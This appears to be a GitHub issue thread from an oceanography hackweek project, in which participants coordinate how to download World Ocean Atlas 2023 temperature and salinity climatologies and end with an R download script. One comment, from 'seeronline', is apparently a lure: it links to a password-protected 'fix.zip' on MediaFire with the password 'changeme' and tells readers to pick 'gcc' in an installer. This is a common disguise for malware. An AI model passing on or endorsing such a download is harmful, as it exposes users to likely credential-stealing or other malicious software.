### ISSUE TITLE
Access WOA2023 programatically

### ISSUE THREAD

**Issue by lidefi87** [oceanhackweek/ohw24_fishmip_shiny_au#1]
We need temperature and salinity data from WOA2023: https://www.ncei.noaa.gov/products/world-ocean-atlas. We need 0.25 degree resolution data.

Python based notebook for WOA18: https://github.com/Fish-MIP/FishMIP_extracting-data/blob/main/Scripts/Access_Clipping_WOA.ipynb

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lidefi87** [comment]
We will be using seasonal climatologies for the period between 1981 and 2010 (decav81B0) 

Link to docs: https://www.ncei.noaa.gov/data/oceans/woa/WOA23/DOCUMENTATION/WOA23_Product_Documentation.pdf

**Comment by stormeyseas** [comment]
All done 😊 Use script downloading_WOA.R
